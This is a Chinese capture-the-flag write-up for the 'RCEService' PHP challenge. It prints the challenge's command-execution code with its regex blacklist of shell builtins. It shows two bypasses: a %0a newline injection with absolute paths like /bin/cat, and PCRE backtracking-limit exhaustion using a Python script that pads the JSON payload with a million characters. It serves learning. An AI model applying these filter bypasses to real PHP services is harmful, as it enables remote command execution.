服务器之家:专注于VPS、云服务器配置技术及软件下载分享
分类导航

PHP教程|ASP.NET教程|Java教程|ASP教程|编程技术|正则表达式|C/C++|IOS|C#|Swift|Android|VB|R语言|JavaScript|易语言|vb.net|

服务器之家 - 编程语言 - PHP教程 - PHP试题之RCEService正则回溯解答

PHP试题之RCEService正则回溯解答

2022-11-07 15:30-栀蓝- PHP教程

这篇文章主要为大家介绍了PHP试题之RCEService正则回溯解答,有需要的朋友可以借鉴参考下,希望能够有所帮助,祝大家多多进步早日升职加薪

PHP试题之RCEService正则回溯解答

打开题目输入JSON类型的cmd后,尝试读取index.php的源代码,但是读取不出来,并且扫后台出来的/index以及/index/login也没有任何东西,实在不知道怎么做了,只能看一下别人的wp,发现别人以来都是审查源码,我就奇怪了,源码怎么弄来的,看了很多wp发现应该是比赛的时候直接给的源码,但是buu平台忘记加上了

<?php
putenv("PATH=/home/rceservice/jail");
if (isset($_REQUEST["cmd"])) {
    $json = $_REQUEST["cmd"];
    if (!is_string($json)) {
        echo "Hacking attempt detected<br/><br/>";
    } elseif (preg_match("/^.*(alias|bg|bind|break|builtin|case|cd|command|compgen|complete|continue|declare|dirs|disown|echo|enable|eval|exec|exit|export|fc|fg|getopts|hash|help|history|if|jobs|kill|let|local|logout|popd|printf|pushd|pwd|read|readonly|return|set|shift|shopt|source|suspend|test|times|trap|type|typeset|ulimit|umask|unalias|unset|until|wait|while|[x00-x1FA-Z0-9!#-/;-@[-`|~x7F]+).*$/", $json)) {
        echo "Hacking attempt detected<br/><br/>";
    } else {
        echo "Attempting to run command:<br/>";
        $cmd = json_decode($json, true)["cmd"];
        if ($cmd !== NULL) {
            system($cmd);
        } else {
            echo "Invalid input";
        }
        echo "<br/><br/>";
    }
}
?>

看到最后的system以及正则,看来这题是要绕过正则执行cmd命令了,这么多黑名单函数应该不会让我们找漏网之鱼吧,不会吧不会吧

我们看到正则表达式没有添加修饰符,那我们可以利用多行匹配这个漏洞了

PHP试题之RCEService正则回溯解答

 在这里我们可以利用%0a换行符进行绕过正则匹配,而且可以看到要有修饰符s才会让.*匹配换行符,因此我们这里可以利用我们之前的ls试试能不能成功

PHP试题之RCEService正则回溯解答

发现依然可以出来index.php;源代码中编译了环境变量path(我以为只是单纯暗示我们这个目录),我们就在那个目录下看看 

PHP试题之RCEService正则回溯解答

发现了flag文件,我用nl,cat,more,less等命令都读取不出来 ,查资料发现,系统命令需要有特定的环境变量的也就是路径,系统找不到该路径下的exe文件怎么执行系统命令

因此这个地方查阅资料后发现只能调用绝对路径下的命令,cat命令就在/bin/目录下面

PHP试题之RCEService正则回溯解答

 第二种办法也就是正则表达式回溯过多导致false,说实话我还是第一次听到正则的回溯问题

PHP利用PCRE回溯次数限制绕过某些安全限制

简单来说就是正则表达式匹配的时候某个.*将后面的字符全部匹配到了,导致表达式后面的式子没有地方匹配,因此一个一个字符吐出来,直到后面的式子全部匹配完毕或者回溯次数过多

例子

PHP试题之RCEService正则回溯解答

PHP试题之RCEService正则回溯解答

 经过自己试试果然只能回溯一百万次

'/^.*

正则表达式最前面的匹配字符,^代表首个字母,'.'代表除换行符之外的所有字符,*代表前面那个表达式重复执行多次,因此他这里直接把我们的payload全部匹配完毕,导致后面的匹配不到字符了,只能一个个回溯

PHP试题之RCEService正则回溯解答

再将后面的匹配一下字符,可以发现目前写的小写字母都没有过滤掉,因为十六进制x00-x1f换算成十进制并没有到小写字母的ascii值那个地方,因此我们可以任意利用一个小写字母×个一百万次,就可以让正则表达式直接失败

PHP试题之RCEService正则回溯解答

import requests
url="http://5dd96313-13f8-4eb6-89eb-0dbb5a4ba30a.node3.buuoj.cn"
data={
    "cmd":"{"cmd":"/bin/cat /home/rceservice/flag","feng":""+"a"*1000000+""}"
}
r=requests.post(url=url,data=data).text
print(r)

以上就是PHP试题之RCEService正则回溯解答的详细内容,更多关于PHP试题RCEService正则回溯的资料请关注服务器之家其它相关文章!

原文地址:https://blog.csdn.net/qq_54929891/article/details/123804652

  • PHP
  • RCEService
  • 正则回溯

    • 延伸 · 阅读

    精彩推荐
    最近更新
    编辑推荐
    阅读排行
    热门标签
    2038   2021   65279   100010   实参   形参   PHP文件   bcompiler   在线时间   存储方案   PHP技术   php安全   编程效率   Foxmail   PHPnow   apache_pn   visitFile   dede模板标签   escape   IP查询   GOOGLE地图   递归循环   颠倒   变量引用   自动获取   递归删除   加载文件   异常机制   递增运算   安全限制  
    © 2019-2022 服务器之家(www.tuohang.net) 版权所有关于我们联系我们版权申明网站地图